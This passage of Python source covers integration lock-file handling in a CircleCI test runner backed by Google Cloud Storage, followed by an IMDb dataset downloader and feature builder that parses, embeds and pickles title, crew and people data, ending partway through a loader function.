        conf_json_path: Path to conf.json file

    Returns:
        A boolean indicating the lock attempt result
    """
    conf, _ = load_conf_files(conf_json_path, None)
    parallel_integrations_names = conf['parallel_integrations']
    # Integrations that may run in parallel never need a lock.
    lockable_details = [detail for detail in integrations_details
                        if detail['name'] not in parallel_integrations_names]
    integration_names = get_integrations_list(lockable_details)
    if integration_names:
        print_msg = f'Attempting to lock integrations {integration_names}, with timeout {test_timeout}'
    else:
        print_msg = 'No integrations to lock'
    prints_manager.add_print_job(print_msg, print, thread_index, include_timestamp=True)
    try:
        return lock_integrations(lockable_details, test_timeout, storage.Client(), prints_manager, thread_index)
    except Exception as e:
        prints_manager.add_print_job(f'attempt to lock integration failed for unknown reason.\nError: {e}',
                                     print_warning,
                                     thread_index,
                                     include_timestamp=True)
        return False
def workflow_still_running(workflow_id: str) -> bool:
    """
    Report whether the given CircleCI workflow is still running.

    The current workflow is always considered running; for any other workflow the
    CircleCI API is queried, and a failed query is conservatively treated as
    "still running".

    Args:
        workflow_id: The ID of the workflow

    Returns:
        True if the workflow is running, else False
    """
    if workflow_id == WORKFLOW_ID:
        # No need to query the API about our own workflow.
        return True
    try:
        response = requests.get(f'https://circleci.com/api/v2/workflow/{workflow_id}',
                                headers={'Accept': 'application/json'},
                                auth=(CIRCLE_STATUS_TOKEN, ''))
        response.raise_for_status()
    except Exception as e:
        print(f'Failed to get circleci response about workflow with id {workflow_id}, error is: {e}')
        return True
    return response.json().get('status') not in ('canceled', 'success', 'failed')
def lock_integrations(integrations_details: list,
                      test_timeout: int,
                      storage_client: storage.Client,
                      prints_manager: ParallelPrintsManager,
                      thread_index: int) -> bool:
    """
    Locks all the test's integrations

    Args:
        integrations_details: List of current test's integrations
        test_timeout: Test timeout in seconds
        storage_client: The GCP storage client
        prints_manager: ParallelPrintsManager object
        thread_index: The index of the thread that executes the unlocking

    Returns:
        True if all the test's integrations were successfully locked, else False
    """
    integrations = get_integrations_list(integrations_details)
    if not integrations:
        # No integrations means nothing to lock - the test may run freely.
        return True
    existing_integrations_lock_files = get_locked_integrations(integrations, storage_client)
    for integration, lock_file in existing_integrations_lock_files.items():
        # Each file has content in the form of <workflow-id>:<circleci-build-number>:<timeout in seconds>
        # If it has not expired - it means the integration is currently locked by another test.
        workflow_id, build_number, lock_timeout = lock_file.download_as_string().decode().split(':')
        if not lock_expired(lock_file, lock_timeout) and workflow_still_running(workflow_id):
            # there is a locked integration for which the lock is not expired - test cannot be executed at the moment
            prints_manager.add_print_job(
                f'Could not lock integration {integration}, another lock file was exist with '
                f'build number: {build_number}, timeout: {lock_timeout}, last update at {lock_file.updated}.\n'
                f'Delaying test execution',
                print,
                thread_index,
                include_timestamp=True)
            return False
    integrations_generation_number = {}
    # Gathering generation number with which the new file will be created,
    # See https://cloud.google.com/storage/docs/generations-preconditions for details.
    for integration in integrations:
        if integration in existing_integrations_lock_files:
            integrations_generation_number[integration] = existing_integrations_lock_files[integration].generation
        else:
            # Generation 0 means "create only if the object does not exist yet".
            integrations_generation_number[integration] = 0
    return create_lock_files(integrations_generation_number, prints_manager,
                             storage_client, integrations_details, test_timeout, thread_index)
def get_integrations_list(test_integrations: list) -> list:
    """
    Extract the integration names from a list of integration-detail dicts.

    Args:
        test_integrations: List of the current test's integration detail dicts.

    Returns:
        A list with the name of every integration taking part in the test.
    """
    names = []
    for integration in test_integrations:
        names.append(integration['name'])
    return names
def create_lock_files(integrations_generation_number: dict,
                      prints_manager: ParallelPrintsManager,
                      storage_client: storage.Client,
                      integrations_details: list,
                      test_timeout: int,
                      thread_index: int) -> bool:
    """
    This method tries to create a lock files for all integrations specified in 'integrations_generation_number'.
    Each file contains '<workflow-id>:<circle-ci-build-number>:<test-timeout + 30>'
    where the workflow/build parts are for debugging and troubleshooting,
    and the timeout part is to be able to unlock revoked test files
    (the extra 30 seconds is a grace period over the test timeout).
    If for any of the integrations, the lock file creation will fail- the already created files will be cleaned.

    Args:
        integrations_generation_number: A dict in the form of {<integration-name>:<integration-generation>},
            where generation 0 means no lock file currently exists.
        prints_manager: ParallelPrintsManager object
        storage_client: The GCP storage client
        integrations_details: List of current test's integrations
        test_timeout: The test timeout in seconds
        thread_index: The index of the thread that executes the locking

    Returns:
        True if a lock file was created for every integration, False otherwise.
    """
    # NOTE(review): 'locked_integrations' is accumulated but never read; cleanup on
    # failure uses 'integrations_details' instead.
    locked_integrations = []
    bucket = storage_client.bucket(BUCKET_NAME)
    for integration, generation_number in integrations_generation_number.items():
        blob = bucket.blob(f'{LOCKS_PATH}/{integration}')
        try:
            # if_generation_match makes the upload atomic: it fails with
            # PreconditionFailed when another build created/changed the file first.
            blob.upload_from_string(f'{WORKFLOW_ID}:{CIRCLE_BUILD_NUM}:{test_timeout + 30}',
                                    if_generation_match=generation_number)
            prints_manager.add_print_job(f'integration {integration} locked',
                                         print,
                                         thread_index,
                                         include_timestamp=True)
            locked_integrations.append(integration)
        except PreconditionFailed:
            # if this exception occurs it means that another build has locked this integration
            # before this build managed to do it.
            # we need to unlock all the integrations we have already locked and try again later
            prints_manager.add_print_job(
                f'Could not lock integration {integration}, Create file with precondition failed.'
                f'delaying test execution.',
                print_warning,
                thread_index,
                include_timestamp=True)
            unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
            return False
    return True
def unlock_integrations(integrations_details: list,
                        prints_manager: ParallelPrintsManager,
                        storage_client: storage.Client,
                        thread_index: int) -> None:
    """
    Delete all integration lock files for integrations specified in 'locked_integrations'

    Args:
        integrations_details: List of current test's integrations
        prints_manager: ParallelPrintsManager object
        storage_client: The GCP storage client
        thread_index: The index of the thread that executes the unlocking
    """
    locked_integrations = get_integrations_list(integrations_details)
    locked_integration_blobs = get_locked_integrations(locked_integrations, storage_client)
    for integration, lock_file in locked_integration_blobs.items():
        try:
            # Verifying build number is the same as current build number to avoid deleting other tests lock files
            # NOTE(review): this compares the decoded string against CIRCLE_BUILD_NUM -
            # confirm CIRCLE_BUILD_NUM is a str, otherwise the comparison is always False.
            _, build_number, _ = lock_file.download_as_string().decode().split(':')
            if build_number == CIRCLE_BUILD_NUM:
                # if_generation_match makes the delete atomic: it fails with
                # PreconditionFailed when the file changed since we read it.
                lock_file.delete(if_generation_match=lock_file.generation)
                prints_manager.add_print_job(
                    f'Integration {integration} unlocked',
                    print,
                    thread_index,
                    include_timestamp=True)
        except PreconditionFailed:
            prints_manager.add_print_job(f'Could not unlock integration {integration} precondition failure',
                                         print_warning,
                                         thread_index,
                                         include_timestamp=True)
def get_locked_integrations(integrations: list, storage_client: storage.Client) -> dict:
    """
    Getting all locked integrations files
    Args:
        integrations: Integrations that we want to get lock files for
        storage_client: The GCP storage client
    Returns:
        A dict of the form {<integration-name>:<integration-blob-object>} for all integrations that has a blob object.
    """
    # Listing all files in lock folder
    # Wrapping in 'list' operator because list_blobs return a generator which can only be iterated once
    lock_files_ls = list(storage_client.list_blobs(BUCKET_NAME, prefix=f'{LOCKS_PATH}'))
    # Index the listing by blob name once (O(n)); the original rescanned the
    # whole listing for every requested integration (O(n * m)).
    blobs_by_name = {lock_file_blob.name: lock_file_blob for lock_file_blob in lock_files_ls}
    current_integrations_lock_files = {}
    for integration in integrations:
        blob = blobs_by_name.get(f'{LOCKS_PATH}/{integration}')
        if blob is not None:
            current_integrations_lock_files[integration] = blob
    return current_integrations_lock_files
def lock_expired(lock_file: storage.Blob, lock_timeout: str) -> bool:
    """
    Tell whether 'lock_file' is older than 'lock_timeout' seconds.
    A non-expired lock means that the integration represented by the lock file
    is currently locked and is being tested in another build.
    Args:
        lock_file: The lock file blob object
        lock_timeout: The expiration timeout of the lock in seconds
    Returns:
        True if the lock has expired it's timeout, else False
    """
    lock_age = datetime.datetime.now(tz=pytz.utc) - lock_file.updated
    return lock_age >= datetime.timedelta(seconds=int(lock_timeout))
def main():
    """Entry point: parse the test settings and run the test suite."""
    print("Time is: {}\n\n\n".format(datetime.datetime.now()))
    tests_settings = options_handler()
    # should be removed after solving: https://github.com/demisto/etc/issues/21383
    # -------------
    if 'master' in tests_settings.serverVersion.lower():
        # Fix: message previously claimed "30 secs" while the actual delay is 45.
        print('[{}] sleeping for 45 secs'.format(datetime.datetime.now()))
        sleep(45)
    # -------------
    manage_tests(tests_settings)


if __name__ == '__main__':
    main()
|
imbd_data_loader.py | import os
from urllib import request
import subprocess
import csv
import sys
import pickle
from sklearn.preprocessing import MultiLabelBinarizer
import spacy
from functools import partial
from multiprocessing import Manager,Process
from scipy.sparse import lil_matrix
from scipy.sparse import csr_matrix
import numpy as np
import time
# nohup python imbd_data_loader.py > myprogram.out 2> myprogram.err &
csv.field_size_limit(sys.maxsize)
nbr_processes = 90
def embed_genre_dic(embed_dict, id2class_dic):
    """Encode every movie's genre list as a sparse multi-hot row.

    embed_dict maps genre name -> class index; id2class_dic maps movie id ->
    list of genre names. Returns a dict mapping movie id -> sparse matrix.
    """
    mlb = MultiLabelBinarizer(classes=list(embed_dict.values()), sparse_output=True)

    def _encode(genre_names):
        # Deduplicate via a set, then binarize the index set into one row.
        return mlb.fit_transform([{embed_dict[genre] for genre in genre_names}])

    return {movie_id: _encode(genres) for movie_id, genres in id2class_dic.items()}
def embed_word2vec(title, nlps):
    """Embed `title` by concatenating the doc vectors of each model in `nlps`.

    Args:
        title: Text to embed.
        nlps: Iterable of loaded spacy pipelines (callables whose result has
            a `.vector` attribute).

    Returns:
        1-D numpy array: the models' doc vectors concatenated in order, or
        None when `nlps` is empty (preserves the original behavior).
    """
    vectors = [nlp(title).vector for nlp in nlps]
    if not vectors:
        return None
    if len(vectors) == 1:
        # Single model: return its vector directly, as the original did.
        return vectors[0]
    # One concatenate call instead of the original's repeated pairwise
    # np.concatenate inside the loop.
    return np.concatenate(vectors)
IMDB_DIR= '../../data/imdb_data/'
def _download_imdb(flag_overwrite=False):
    """Download and gunzip the IMDb dataset dumps into IMDB_DIR.

    Already-present (gunzipped) files are skipped. NOTE(review):
    `flag_overwrite` is currently unused — confirm whether it should force a
    re-download or be dropped.
    """
    if os.path.isdir(IMDB_DIR) is False:
        os.mkdir(IMDB_DIR)
    # Fix: title.ratings.tsv and title.principals.tsv are opened later by
    # read_imdb2dic()/read_subset_imdb2dic() but were missing from the
    # download list, causing FileNotFoundError on a fresh setup.
    DOWNLOAD_INFO = [('title.basics.tsv.gz', 'https://datasets.imdbws.com/title.basics.tsv.gz'),
                     ('title.akas.tsv.gz', 'https://datasets.imdbws.com/title.akas.tsv.gz'),
                     ('title.crew.tsv.gz', 'https://datasets.imdbws.com/title.crew.tsv.gz'),
                     ('title.ratings.tsv.gz', 'https://datasets.imdbws.com/title.ratings.tsv.gz'),
                     ('title.principals.tsv.gz', 'https://datasets.imdbws.com/title.principals.tsv.gz'),
                     ('name.basics.tsv.gz', 'https://datasets.imdbws.com/name.basics.tsv.gz')]
    for save_name, url in DOWNLOAD_INFO:
        target = os.path.join(IMDB_DIR, save_name[:-3])  # name after gunzip
        if os.path.isfile(target):
            # Fix: the skip message previously printed the .gz path although
            # the existence check is done on the gunzipped file.
            print("Found {}, Skip".format(target))
        else:
            data_file = request.urlopen(url)
            with open(os.path.join(IMDB_DIR, save_name), 'wb') as output:
                output.write(data_file.read())
            # NOTE(review): gunzip already removes the .gz, so the trailing
            # `rm` is a no-op that fails quietly — confirm and drop if unwanted.
            subprocess.call(['gunzip', '{}/{}'.format(IMDB_DIR, save_name)])
            subprocess.call(['rm', '{}/{}'.format(IMDB_DIR, save_name)])
def read_imdb2dic(IMDB_DIR='../data/imdb_data/'):
    """Parse the full IMDb TSV dumps into lookup dictionaries and pickle them.

    Reads title.basics, title.ratings, title.akas, title.principals,
    title.crew and name.basics from IMDB_DIR and returns:
        titles2id_dic:      title -> {movie id -> start year}
        titles2year_dic:    title -> {start year -> [movie ids]}
        id2info_dic:        movie id -> [title1, title2, (start, end), type,
                            is_adult, runtime] (+ [rating, votes] when rated)
        id2genre_dic:       movie id -> list of genre strings
        id2l_director_dic:  movie id -> list of director person ids
        id2l_writer_dic:    movie id -> list of writer person ids
        id2l_principal_dic: movie id -> [[person id, category, job, character]]
        people_id2name_dic: person id -> [name, birth, death, professions,
                            known-for titles]
    Each dictionary is also pickled into IMDB_DIR as a side effect.
    """
    _download_imdb()
    titles2id_dic = {}
    titles2year_dic = {}
    _id2year_dic = {}
    id2info_dic = {}
    # TODO genre to multihot encoding
    id2genre_dic = {}
    with open(os.path.join(IMDB_DIR, "title.basics.tsv"), newline='', encoding='utf-8') as csvfile:
        IMDB_title_name = (csv.reader(csvfile, delimiter='\t'))
        next(IMDB_title_name)  # skip header row
        for row in IMDB_title_name:
            str_id = row[0]
            title_type = row[1].lower()
            title1 = row[2].lower()
            title2 = row[3].lower()
            assert "\n" not in title1 and "\n" not in title2
            is_adult = row[4]
            start_year = row[5]
            end_year = row[6]
            runtime = row[7]
            # '\N' is IMDb's NULL marker.
            start_year = None if start_year == '\\N' else float(start_year)
            end_year = None if end_year == '\\N' else float(end_year)
            is_adult = None if is_adult == '\\N' else float(is_adult)
            runtime = None if runtime == '\\N' else float(runtime)
            if start_year is not None and len(row) == 9:
                if str_id not in _id2year_dic:
                    _id2year_dic[str_id] = start_year
                if str_id not in id2info_dic:
                    id2info_dic[str_id] = [title1, title2, ((start_year), (end_year)), title_type, (is_adult), (runtime)]
                if str_id not in id2genre_dic:
                    id2genre_dic[str_id] = row[8].lower().split(",")
                if title1 not in titles2id_dic:
                    titles2id_dic[title1] = {}
                    titles2id_dic[title1][str_id] = start_year
                    titles2year_dic[title1] = {}
                    titles2year_dic[title1][start_year] = [str_id]
                else:
                    if str_id not in titles2id_dic[title1]:
                        titles2id_dic[title1][str_id] = start_year
                        if start_year not in titles2year_dic[title1]:
                            titles2year_dic[title1][start_year] = [str_id]
                        else:
                            titles2year_dic[title1][start_year].append(str_id)
                # Register the original title as well when it differs.
                if title2 != title1:
                    if title2 not in titles2id_dic:
                        titles2id_dic[title2] = {}
                        titles2id_dic[title2][str_id] = start_year
                        titles2year_dic[title2] = {}
                        titles2year_dic[title2][start_year] = [str_id]
                    else:
                        if str_id not in titles2id_dic[title2]:
                            titles2id_dic[title2][str_id] = start_year
                            if start_year not in titles2year_dic[title2]:
                                titles2year_dic[title2][start_year] = [str_id]
                            else:
                                titles2year_dic[title2][start_year].append(str_id)
                else:
                    continue
            else:
                continue
    with open(os.path.join(IMDB_DIR, "title.ratings.tsv"), newline='', encoding='utf-8') as csvfile:
        IMDB_title_rating = (csv.reader(csvfile, delimiter='\t'))
        next(IMDB_title_rating)
        for row in IMDB_title_rating:
            str_id = row[0]
            average_rating = row[1]
            num_votes = row[2]
            # TODO Check if this title is important or not.. does it exist in other dictionaries
            if str_id not in id2info_dic:
                id2info_dic[str_id] = [float(average_rating), float(num_votes)]
            else:
                id2info_dic[str_id] += [float(average_rating), float(num_votes)]
    with open(os.path.join(IMDB_DIR, "title.akas.tsv"), newline='', encoding='utf-8') as csvfile2:
        IMDB_akas_name = (csv.reader(csvfile2, delimiter="\t"))
        next(IMDB_akas_name)
        for row in IMDB_akas_name:
            str_id = row[0]
            title3 = row[2].lower()
            region = row[3].lower()
            # Fix: was `row[4].lower` (bound method object, never called);
            # call it so `language` actually holds the lower-cased string.
            language = row[4].lower()
            # TODO decide if these attributes are needed.
            if "\n" in title3:
                print("len(title3)", len(title3))
                continue
            assert "\n" not in title3
            if str_id in _id2year_dic:
                year = _id2year_dic[str_id]
                if title3 not in titles2id_dic:
                    titles2id_dic[title3] = {}
                    titles2id_dic[title3][str_id] = year
                    titles2year_dic[title3] = {}
                    titles2year_dic[title3][year] = [str_id]
                else:
                    if str_id not in titles2id_dic[title3]:
                        titles2id_dic[title3][str_id] = year
                        if year not in titles2year_dic[title3]:
                            titles2year_dic[title3][year] = [str_id]
                        else:
                            titles2year_dic[title3][year].append(str_id)
            else:
                # only the akas with basic info are retained
                continue
    print("#title name: {}".format(len(titles2id_dic)))
    print("#movie id: {}".format(len(id2info_dic)))
    with open(os.path.join(IMDB_DIR, '_title_name2idsdic_dic.pkl'), 'wb') as f:
        pickle.dump(titles2id_dic, f)
    with open(os.path.join(IMDB_DIR, '_title_name2yeardic_dic.pkl'), 'wb') as f:
        pickle.dump(titles2year_dic, f)
    with open(os.path.join(IMDB_DIR, '_id2info_dic.pkl'), 'wb') as f:
        pickle.dump(id2info_dic, f)
    with open(os.path.join(IMDB_DIR, '_id2genre_dic.pkl'), 'wb') as f:
        pickle.dump(id2genre_dic, f)
    ###################################################################################
    ###################################################################################
    id2l_director_dic = {}
    id2l_writer_dic = {}
    id2l_principal_dic = {}
    with open(os.path.join(IMDB_DIR, "title.principals.tsv"), newline='', encoding='utf-8') as csvfile:
        IMDB_title_principals = (csv.reader(csvfile, delimiter='\t'))
        next(IMDB_title_principals)
        for row in IMDB_title_principals:
            str_id = row[0]
            ordering = row[1]
            person_id = row[2]
            job_category = row[3].lower()
            job_title = row[4]
            job_title = None if job_title == '\\N' else job_title.lower()
            character = row[5]
            character = None if character == '\\N' else character.lower()
            # TODO is it an entry per person and movie or list of persons
            if str_id not in id2l_principal_dic:
                id2l_principal_dic[str_id] = [[person_id, job_category, job_title, character]]
            else:
                id2l_principal_dic[str_id] += [[person_id, job_category, job_title, character]]
    # TODO Possible Bug. How about when only one or 2 directors or writers exists?
    with open(os.path.join(IMDB_DIR, "title.crew.tsv"), newline='', encoding='utf-8') as csvfile:
        file_rows = (csv.reader(csvfile, delimiter='\t'))
        next(file_rows)
        for row in file_rows:
            id = row[0]
            director_str = row[1]
            writer_str = row[2]
            if id in id2l_director_dic:
                print(id, id2l_director_dic[id])
            else:
                if director_str != "\\N" and len(director_str) > 2:
                    director_vec = director_str.split(",")
                    id2l_director_dic[id] = director_vec
            if id in id2l_writer_dic:
                print(id, id2l_writer_dic[id])
            else:
                if writer_str != "\\N" and len(writer_str) > 2:
                    writer_vec = writer_str.split(",")
                    id2l_writer_dic[id] = writer_vec
    with open(os.path.join(IMDB_DIR, '_id2director_dic.pkl'), 'wb') as f:
        pickle.dump(id2l_director_dic, f)
    with open(os.path.join(IMDB_DIR, '_id2writer_dic.pkl'), 'wb') as f:
        pickle.dump(id2l_writer_dic, f)
    # TODO test data dumping and loading
    with open(os.path.join(IMDB_DIR, '_id2_principal_dic.pkl'), 'wb') as f:
        pickle.dump(id2l_principal_dic, f)
    ###################################################################################
    ###################################################################################
    people_id2name_dic = {}
    with open(os.path.join(IMDB_DIR, "name.basics.tsv"), newline='', encoding='utf-8') as csvfile:
        file_rows = (csv.reader(csvfile, delimiter='\t'))
        next(file_rows)
        for row in file_rows:
            id = row[0]
            name = row[1]
            birthyear = row[2]
            deathyear = row[3]
            primaryProfession = row[4]
            knownfortitles = row[5]
            if id in people_id2name_dic:
                print(id, people_id2name_dic[id])
            else:
                people_id2name_dic[id] = [name, birthyear, deathyear, primaryProfession, knownfortitles]
    with open(os.path.join(IMDB_DIR, '_people_id2name_dic.pkl'), 'wb') as f:
        pickle.dump(people_id2name_dic, f)
    print("IMDb dics generated ...")
    return titles2id_dic, titles2year_dic, id2info_dic, id2genre_dic, \
        id2l_director_dic, id2l_writer_dic, id2l_principal_dic, people_id2name_dic
def load_nlp_models(nlp_model='en_fr_lang'):
    """Load the spacy pipelines for titles, characters and professions.

    Returns a 3-tuple (title models, character models, profession models).
    Raises ValueError for an unknown `nlp_model` preset.
    """
    if nlp_model == 'small':
        # One multilingual model shared by all three roles.
        shared = [spacy.load('xx_ent_wiki_sm')]
        return shared, shared, shared
    if nlp_model == 'en_fr_lang':
        english = spacy.load('en_core_web_lg')
        french = spacy.load('fr_core_news_md')
        return [english, french], [english], [english]
    if nlp_model == 'various_lang':
        english = spacy.load('en_core_web_lg')
        french = spacy.load('fr_core_news_md')
        german = spacy.load('de_core_news_md')
        italian = spacy.load('it_core_news_sm')
        spanish = spacy.load('es_core_news_md')
        return [english, french, german, italian, spanish], [english], [english]
    raise ValueError("Not supported.")
def parallel_dict_nlp_processing(dictionary_to_transform, nlps):
    '''
    Parallel processing of dict rows with shared memory for obtaining the nlp representation
    from the string entry of the dictionary
    :param dictionary_to_transform: The dictionary whose entries will be transformed
    :param nlps: the nlp models to use in the transformation
    :return: a multiprocessing Manager proxy dict mapping the original keys to
        their embeddings (callers wrap it in dict() to materialize it)
    '''
    def embed_titles(d, vs, ks):
        # Worker: embed each (value, key) pair into the shared proxy dict.
        for v, k in zip(vs, ks):
            d[k] = embed_word2vec(v, nlps)
    manager = Manager()
    d = manager.dict()  # proxy dict shared between worker processes
    keys, values = zip(*dictionary_to_transform.items())
    # Split the items into roughly nbr_processes equal chunks; at least one
    # item per chunk for small inputs.
    len_per_split = len(keys) // nbr_processes
    if len_per_split == 0:
        len_per_split = 1
    # TODO do not pass the whole value key only the subsets...
    job = []
    for i in range(1, nbr_processes + 2):
        if len_per_split * i >= len(values):
            # Last real chunk takes the remaining tail; subsequent iterations
            # yield empty slices and therefore no-op worker processes.
            vs = values[len_per_split * (i - 1):]
            ks = keys[len_per_split * (i - 1):]
        else:
            vs = values[len_per_split * (i - 1):len_per_split * (i)]
            ks = keys[len_per_split * (i - 1):len_per_split * (i)]
        job += [Process(target=embed_titles, args=(d, vs, ks,))]
    _ = [p.start() for p in job]
    _ = [p.join() for p in job]
    #print(d)
    return d
def read_subset_imdb2dic(nlp_model='en_fr_lang', IMDB_DIR='../data/imdb_data/'):
    """Parse a feature-oriented subset of the IMDb dumps and pickle it.

    Unlike read_imdb2dic(), titles are embedded with spacy word vectors,
    genres / job categories / professions become sparse multi-hot rows.
    Returns (id2numer_info_dic, id2str_info_dic, id2genre_dic,
    id2l_director_dic, id2l_writer_dic, id2l_principal_dic,
    people_id2name_dic, people_id2primaryProfession); each is also pickled
    into IMDB_DIR as a side effect.
    """
    #_download_imdb()
    id2numer_info_dic = {}
    id2str_info_dic = {}
    id2genre_dic = {}
    # TODO load first to dictionary and then process in parallel for the nlp model ...
    nlps_title, nlps_characters, nlps_primary_profession = load_nlp_models(nlp_model)
    with open(os.path.join(IMDB_DIR, "title.basics.tsv"), newline='', encoding='utf-8') as csvfile:
        IMDB_title_name = (csv.reader(csvfile, delimiter='\t'))
        next(IMDB_title_name)  # skip header row
        genre_embed_dict = {}
        count = 0  # 30 total
        for row in IMDB_title_name:
            #if count== 10:
            # for debugging
            # break
            if len(row) == 9:
                str_id = row[0]
                title_type = row[1].lower()
                title1 = row[2].lower()
                title2 = row[3].lower()
                assert "\n" not in title1 and "\n" not in title2
                is_adult = row[4]
                start_year = row[5]
                end_year = row[6]
                runtime = row[7]
                #print(row)
                # '\N' is IMDb's NULL marker.
                start_year = None if start_year == '\\N' else float(start_year)
                end_year = None if end_year == '\\N' else float(end_year)
                is_adult = None if is_adult == '\\N' else float(is_adult)
                runtime = None if runtime == '\\N' else float(runtime)
                if start_year is not None and len(row) == 9:
                    if str_id not in id2numer_info_dic:
                        id2numer_info_dic[str_id] = [start_year, end_year, title_type, (is_adult), (runtime)]
                        id2str_info_dic[str_id] = title1 + ' ' + title2
                    if str_id not in id2genre_dic:
                        id2genre_dic[str_id] = row[8].lower().split(",")
                        for gen in id2genre_dic[str_id]:
                            if gen not in genre_embed_dict:
                                genre_embed_dict[gen] = count
                                count += 1
                else:
                    continue
            else:
                continue
    s = time.time()
    id2genre_dic = embed_genre_dic(genre_embed_dict, id2genre_dic)
    e = time.time()
    print('Genre embedding runtime')
    print(e - s)
    s = time.time()
    # get the real dict from the proxy dictionary of the multiprocessing
    id2str_info_dic = dict(parallel_dict_nlp_processing(id2str_info_dic, nlps=nlps_title))
    e = time.time()
    print('Parallel processing runtime')
    print(e - s)
    print(len(id2str_info_dic.values()))
    #print(id2str_info_dic.keys())
    #print(id2str_info_dic)
    with open(os.path.join(IMDB_DIR, "title.ratings.tsv"), newline='', encoding='utf-8') as csvfile:
        IMDB_title_rating = (csv.reader(csvfile, delimiter='\t'))
        next(IMDB_title_rating)
        for row in IMDB_title_rating:
            str_id = row[0]
            average_rating = row[1]
            num_votes = row[2]
            # TODO Check if this title is important or not.. does it exist in other dictionaries
            if str_id in id2numer_info_dic:
                id2numer_info_dic[str_id] += \
                    [float(average_rating), float(num_votes)]
            else:
                id2numer_info_dic[str_id] = [float(average_rating), float(num_votes)]
    print("#movie id: {}".format(len(id2numer_info_dic)))
    with open(os.path.join(IMDB_DIR, '_id2numer_info_dic.pkl'), 'wb') as f:
        pickle.dump(id2numer_info_dic, f)
    with open(os.path.join(IMDB_DIR, '_id2str_info_dic.pkl'), 'wb') as f:
        pickle.dump(id2str_info_dic, f)
    with open(os.path.join(IMDB_DIR, '_id2genre_dic.pkl'), 'wb') as f:
        pickle.dump(id2genre_dic, f)
    sys.stdout.flush()
    ###################################################################################
    ###################################################################################
    id2l_director_dic = {}
    id2l_writer_dic = {}
    id2l_principal_dic = {}
    # for different categories
    mlb = MultiLabelBinarizer(classes=list(range(15)), sparse_output=True)
    s = time.time()
    with open(os.path.join(IMDB_DIR, "title.principals.tsv"), newline='', encoding='utf-8') as csvfile:
        IMDB_title_principals = (csv.reader(csvfile, delimiter='\t'))
        next(IMDB_title_principals)
        total_category = 15
        job_category_count = 0
        job_category_dict = {}
        job_title_dict = {}
        # Fix: was csr_matrix((total_category), dtype=np.int8) — the bare int
        # 15 is promoted by scipy to a 1x1 matrix [[15]], not the intended
        # all-zero 1 x total_category row used as the "no category" encoding.
        zero_category = csr_matrix((1, total_category), dtype=np.int8)
        for row in IMDB_title_principals:
            if len(row) == 6:
                str_id = row[0]
                ordering = row[1]
                person_id = row[2]
                job_category = row[3].lower()
                job_title = row[4]
                job_title = None if job_title == '\\N' else job_title.lower()
                character = row[5]
                character = None if character == '\\N' else character.lower()
                # TODO is it an entry per person and movie or list of persons
                if job_category is not None:
                    if job_category not in job_category_dict:
                        job_category_dict[job_category] = job_category_count
                        job_category_count += 1
                        if job_category_count > total_category:
                            print(job_category_count)
                            total_category = job_category_count
                if job_category is not None:
                    #s=time.time()
                    job_category_one_hot = mlb.fit_transform([set(([job_category_dict[job_category]]))])
                    #e=time.time()
                    #print(e-s)
                else:
                    job_category_one_hot = zero_category
                job_category = job_category_one_hot
                # TODO should we include job title and character played ? job category, more meaningfull
                if str_id not in id2l_principal_dic:
                    id2l_principal_dic[str_id] = [[person_id, job_category]]  # ,job_title,character ]]
                else:
                    id2l_principal_dic[str_id] += [[person_id, job_category]]  # , job_title,character]]
            else:
                continue
    e = time.time()
    print('Read and process principals')
    print(e - s)
    #print(len(id2str_info_dic.values()))
    # TODO Possible Bug. How about when only one or 2 directors or writers exists?
    with open(os.path.join(IMDB_DIR, "title.crew.tsv"), newline='', encoding='utf-8') as csvfile:
        file_rows = (csv.reader(csvfile, delimiter='\t'))
        next(file_rows)
        for row in file_rows:
            id = row[0]
            director_str = row[1]
            writer_str = row[2]
            if id in id2l_director_dic:
                print(id, id2l_director_dic[id])
            else:
                if director_str != "\\N" and len(director_str) > 2:
                    director_vec = director_str.split(",")
                    id2l_director_dic[id] = director_vec
            if id in id2l_writer_dic:
                print(id, id2l_writer_dic[id])
            else:
                if writer_str != "\\N" and len(writer_str) > 2:
                    writer_vec = writer_str.split(",")
                    id2l_writer_dic[id] = writer_vec
    with open(os.path.join(IMDB_DIR, '_id2director_dic.pkl'), 'wb') as f:
        pickle.dump(id2l_director_dic, f)
    with open(os.path.join(IMDB_DIR, '_id2writer_dic.pkl'), 'wb') as f:
        pickle.dump(id2l_writer_dic, f)
    # TODO test data dumping and loading
    with open(os.path.join(IMDB_DIR, '_id2_principal_dic.pkl'), 'wb') as f:
        pickle.dump(id2l_principal_dic, f)
    sys.stdout.flush()
    ###################################################################################
    ###################################################################################
    people_id2name_dic = {}
    people_id2primaryProfession = {}
    # for different proffesions
    mlb = MultiLabelBinarizer(classes=list(range(43)), sparse_output=True)
    s = time.time()
    with open(os.path.join(IMDB_DIR, "name.basics.tsv"), newline='', encoding='utf-8') as csvfile:
        file_rows = (csv.reader(csvfile, delimiter='\t'))
        count_professions = 0
        professions_dict = {}
        next(file_rows)
        for row in file_rows:
            id = row[0]
            name = row[1]
            birthyear = row[2]
            deathyear = row[3]
            primaryProfession = row[4]
            knownfortitles = row[5]
            birthyear = None if birthyear == '\\N' else float(birthyear)
            deathyear = None if deathyear == '\\N' else float(deathyear)
            for prof in primaryProfession.split(","):
                if prof not in professions_dict:
                    professions_dict[prof] = count_professions
                    count_professions += 1
            #primaryProfession= None if len(primaryProfession)==0 else embed_word2vec(primaryProfession,nlps_primary_profession)
            if id in people_id2name_dic:
                print(id, people_id2name_dic[id])
            else:
                people_id2name_dic[id] = [name, birthyear, deathyear, knownfortitles]
                iprof = [professions_dict[prof] for prof in primaryProfession.split(',')]
                people_id2primaryProfession[id] = mlb.fit_transform([set(iprof)])
    with open(os.path.join(IMDB_DIR, '_people_id2name_dic.pkl'), 'wb') as f:
        pickle.dump(people_id2name_dic, f)
    with open(os.path.join(IMDB_DIR, '_people_id2primaryProfession.pkl'), 'wb') as f:
        pickle.dump(people_id2primaryProfession, f)
    print('Read and process people info')
    e = time.time()
    print(e - s)
    #print(len(id2str_info_dic.values()))
    print("IMDb dics generated ...")
    sys.stdout.flush()
    return id2numer_info_dic, id2str_info_dic, id2genre_dic, id2l_director_dic, id2l_writer_dic, \
        id2l_principal_dic, people_id2name_dic, people_id2primaryProfession
def load_imdb_dics():
    """Load the full pickled IMDb dictionaries produced by read_imdb2dic()."""
    def _load(fname):
        with open(os.path.join(IMDB_DIR, fname), 'rb') as f:
            return pickle.load(f)
    titles2id_dic = _load('_title_name2idsdic_dic.pkl')
    titles2year_dic = _load('_title_name2yeardic_dic.pkl')
    id2info_dic = _load('_id2info_dic.pkl')
